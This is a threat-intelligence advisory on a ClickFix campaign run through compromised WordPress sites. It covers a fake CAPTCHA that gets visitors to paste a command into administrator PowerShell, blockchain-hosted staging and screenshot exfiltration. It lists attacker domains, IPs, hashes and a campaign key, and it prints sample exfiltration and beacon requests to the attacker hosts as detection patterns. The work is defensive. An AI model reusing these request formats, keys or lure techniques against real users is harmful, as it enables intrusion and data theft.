TLP:CLEAR Active campaign Delivery degrading
Advisory update · SL-ADV-2026-WP-001 · v16 + v17

WP-002 ClickFix Variants B & C: elevated shells, chain-hopping EtherHiding, and a C2 pushed onto Spamhaus-DROP space

Two new iterations of the WP-002 ClickFix campaign surfaced on compromised WordPress sites in late September 2026. This page consolidates what both captures tell us — what changed, what it means for defenders, and what is still unknown.

Author: Dispensight / SecureLeaf Updated: 2026-10-04 Covers: v16 (2026-09-24) · v17 (2026-09-28) Family: Remus / WP-002 Attribution: infrastructure-level only
2
new compromised lure sites
2
blockchains used for EtherHiding
4
attacker domains (3 burned)
AS202412
now hosting live C2 directly

01Summary

Variant B (v16, freightbook365[.]com) upgraded the social engineering: instead of the non-elevated Win+R Run dialog used through v15, a Russian-localized fake Cloudflare Turnstile walks the visitor through Win+X → PowerShell (Admin) → paste → Enter, so whatever is pasted runs with administrator rights from the very first step. It also added a three-domain failover loader and a previously undocumented screenshot-exfiltration stage that photographs the visitor's page and posts it back to helauth[.]com on every visit — even when the clipboard poison itself is withheld.

Variant C (v17, gogreenlightloans[.]com) shows an operator under pressure. With its Cloudflare-fronted stagers publicly burned, the C2 moved to entry-verifed-cdn[.]codes resolving directly to 178.16.52.101 on the operator's own Spamhaus-DROP-listed AS202412. EtherHiding migrated from BSC-testnet to Polygon — and in the captured session the on-chain lookup failed, so the victim's clipboard received a harmless numeric string instead of a command.

Bottom line: the campaign is still live and still dangerous to visitors, but its delivery is visibly breaking down and its newest C2 is trivially blockable at the network edge.

02Campaign timeline

Mar 2026
Tracking begins
SL-ADV-2026-WP-001 opened on Omegatech (AS202412)-hosted ClickFix/EtherHiding infrastructure.
Jul 2026 · v11–v12.1
Win+X vector first seen
Early waves on BSC-testnet EtherHiding; the paste vector begins evolving from Win+R toward Win+X.
Sep 2026 · v15
dorz[.]nl wave
Non-elevated Win+R, English lure, single asseload[.]com stager. Stager published to OTX/AbuseIPDB.
2026-09-24 · v16
Variant B — freightbook365[.]com
Elevated Win+X shell, Russian locale, new BSC-testnet contract, 3-domain failover, screenshot exfil to helauth[.]com.
2026-09-28 · v17
Variant C — gogreenlightloans[.]com
EtherHiding moves to Polygon; C2 self-hosted on DROP-listed AS202412; on-chain retrieval fails in capture.

03Kill chain (Variants B & C combined)

Reconstructed from embedded-keylog packet captures by independent TLS decryption — every stage below was observed on the wire, not inferred from a sandbox report.

Compromised WordPress lure — victim site · splitcam: never blocklisted

Both lures are small-business sites on GoDaddy hosting. v16: RevSlider 6.7.16 + js_composer 7.8 (transcargo theme). v17: bankio-core theme + Elementor, Cloudflare-fronted.

BC

EtherHiding — T1102 · web service via smart contract

An injected script asks a public blockchain RPC for its next stage. v16: BSC-testnet contract 0x5bc946cd…76f9c. v17: Polygon via polygon-bor-rpc.publicnode.com. Same function selector 0xe2179b8e in both — a strong continuity marker.

B · BSC-testnetC · Polygon

Staging / C2 — T1008 fallback channels · T1583.004

v16: cdn.js tries asseload → cfsubs → helauth in order, all Cloudflare-fronted. v17: a single self-hosted api.php on AS202412 with a base64-JSON beacon ({"action":"dl", k, os, vid, ref}).

B · failoverC · DROP-listed self-host

Clipboard-arming stage — T1204.004 · T1059.001

JavaScript writes a PowerShell command into the visitor's clipboard. v16: XOR/base64 decoder (key qEXvNnc5bx0U), TDS-gated. v17: 658 KB obfuscator.io bundle that pulls the command on-chain.

BC

Elevated ClickFix action — user execution

Fake "verify you are human" overlay: Win+X → I (Terminal / PowerShell as Administrator) → Ctrl+V → Enter. No exploit is involved — the visitor runs the command themselves, with admin rights.

BC

Screenshot reconnaissance — T1113 · Variant B

snap.js (html2canvas, 194 KB) renders the visitor's page to a JPEG and POSTs it as base64 to helauth[.]com/cdn/widget/shot, alongside a /hit fingerprint beacon. Fires regardless of TDS gating.

BC · not observed

04What changed, iteration by iteration

Elementv15 · dorz.nlv16 · Variant Bv17 · Variant C
Paste targetWin+R (non-elevated)Win+X → PowerShell AdminWin+X → PowerShell Admin
Lure localeEnglishRussianRU/EN
EtherHiding chainBSC-testnetBSC-testnet (new contract)Polygon
Stagingsingle asseload3-domain failoversingle self-hosted api.php
C2 hosting209.38.82.72:9048helauth[.]com (Cloudflare)178.16.52.101 — AS202412, DROP
Arming stageXOR key oipCQd0DIbeFXOR key qEXvNnc5bx0Uobfuscator.io, 658 KB
Screenshot exfil—Yes (html2canvas)not observed
Delivery in capturefunctionalTDS-gated / intermittentfailed (on-chain lookup error)

05Assessment

Visitors are not safe, even on "quiet" visits. In v16 the clipboard poison was withheld from some sessions, but screenshot and fingerprint collection ran on every visit. Treat both lure sites as actively harmful until cleaned.
Elevation raises the stakes. Moving the paste target from the Run dialog to an administrator PowerShell means a successful lure no longer needs a separate privilege-escalation step.
Pressure is working. Each burned stager has forced a fallback: failover in v16, then self-hosting on DROP-listed space in v17. Hosting C2 on a Spamhaus-DROP ASN is a forced move, not a preference — it maximizes blockability.
Degraded ≠ disarmed. The injected page shell and loaders remain in place. One working stager or one healthy RPC response is enough to re-arm the chain at will. We assess the pressure link as correlation, not proven causation.

06What we know — and what we don't

Confirmed on the wire

  • Elevated Win+X → PowerShell (Admin) instructions in both variants
  • EtherHiding on two chains, sharing selector 0xe2179b8e
  • v16 failover order and the asseload primary failing
  • v16 screenshot exfil to /cdn/widget/shot as base64 JPEG
  • v17 C2 resolving directly into AS202412 with no CDN fronting
  • v17 server treated the capture as a real target (genuine victim UUID, full 658 KB payload shipped)

Still open

  • Final clipboard command — not extracted in either version; v17's on-chain source failed in capture
  • Classification of v17's fallback numeric string (decoy, encoded, or garbage)
  • Whether Variant C carries the screenshot stage when its chain works
  • Exact TDS gating criteria in Variant B
  • The v17 Polygon contract address (retrieval errored before it was returned)

07Indicators of compromise

Network

TypeValueRoleSeenHandling
domainentry-verifed-cdn[.]codesself-hosted api.php C2v17block
ipv4178.16.52.101C2 host, AS202412 (DROP)v17block
cidr178.16.52.0/24operator prefix serving C2v17block
domainhelauth[.]comrecon / screenshot-exfil C2v16block
domaincfsubs[.]comfailover stagerv16block
domainasseload[.]comprimary stager (burned)v15–v16block
urlhxxps://helauth[.]com/cdn/widget/shotscreenshot exfil (POST)v16alert
uri/cdn/widget/{hit,shot,a/done}beacon / exfil / pollv16alert
stringa3946e3ded820e3d2f02885bf63c8a3a176d58bb9403b402api.php campaign key (k=/s=)v17alert
contract0x5bc946cd5121431c7a43549aee7f567e15176f9cEtherHiding (BSC-testnet)v16track
domainpolygon-bor-rpc.publicnode.compublic RPC abused for EtherHidingv17correlate only
domainfreightbook365[.]comcompromised lurev16victim — notify
domaingogreenlightloans[.]comcompromised lurev17victim — notify

The v16 domains resolve to shared Cloudflare edge addresses (104.21.29.209, 172.67.190.184, 104.21.59.52). Block those domains by name, not by IP — IP blocks would hit unrelated sites. Compromised lure sites are listed for notification and hunting only; please do not blocklist them.

Files (SHA-256)

HashArtifactSeen
ba70a75c4b0d81e083fff510d0d6cc0c622cca3660cfa576e34ee899be7f72bccdn.js — failover loaderv16
c5ef6b9f44e97d55d6a0deac0ef22118410c3114e7b5b97f4fc1b5b0c5b4a1e9a4045c662b80.js — clipboard-arming stagev16
e87e550794322e574a1fda0c1549a3c70dae5a93d9113417a429016838eab8cbsnap.js — html2canvas screenshotterv16
51d4def852645a4f7a436abe7aa4498d08f57395e2f40e3c17cdb3f95d03f2d2obfuscator.io arming stage (658 KB)v17

08Detection highlights

The two highest-value network discriminators, one per variant:

# Variant B — screenshot exfiltration
POST /cdn/widget/shot?s=cdn:X&h=<lure-host>
Host: helauth.com
Content-Type: text/plain;charset=UTF-8
/9j/4AAQSkZJRg...            <-- base64 JPEG of the visitor's page

# Variant C — encoded beacon to DROP-listed infrastructure
GET /api.php?k=a3946e3ded820e3d2f02885bf63c8a3a176d58bb9403b402&d=<base64-json>
Host: entry-verifed-cdn.codes   --> 178.16.52.101 (AS202412)

On endpoints, the shared behaviour across both variants is the most durable signal: an elevated PowerShell or Windows Terminal launched from explorer.exe via the Win+X menu that immediately runs a download cradle. In proxied web traffic, the injected lure markup (id="clipboard-text" alongside checkbox-container) catches visits even when the clipboard stage is gated off.

09Recommended actions

PriorityAction
nowBlock entry-verifed-cdn[.]codes, helauth[.]com, cfsubs[.]com, asseload[.]com and 178.16.52.0/24. If your policy allows, drop all of AS202412 — it is already on Spamhaus DROP.
nowHunt for elevated PowerShell/Terminal spawned via Win+X running download cradles, especially on hosts that visited either lure site.
soonAlert on /cdn/widget/shot base64-JPEG POSTs, /api.php requests carrying the campaign key, and the injected ClickFix DOM in web responses.
soonUser awareness: no legitimate CAPTCHA asks you to open Terminal or PowerShell and paste anything. Ever.
coordSite owners of freightbook365.com and gogreenlightloans.com: your WordPress installs are compromised. Update or remove RevSlider, js_composer and Elementor add-ons, audit admin users, and check theme/footer files for injected script.

10Downloads

STIX 2.1Unified v16 + v17 bundle HTMLv16 technical advisory HTMLv17 technical advisory

The unified bundle supersedes the per-version v16 and v17 STIX files. YARA and Sigma rules remain available with each per-version advisory.

Attribution. Held strictly at the infrastructure level. SecureLeaf makes no named-group or nation-state assertion about this activity.

Splitcam rule. Compromised victim and lure sites are never blocklisted or reported as malicious — their owners are notified instead.

Provenance. Both chains were reconstructed by Dispensight / SecureLeaf from embedded-keylog packet captures via independent TLS decryption. The final clipboard command was not extracted in either capture; nothing on this page reproduces executable attacker code.

SL-ADV-2026-WP-001 · v16 + v17 consolidated · TLP:CLEAR · Dispensight / SecureLeaf · secureleaf.dispensight.com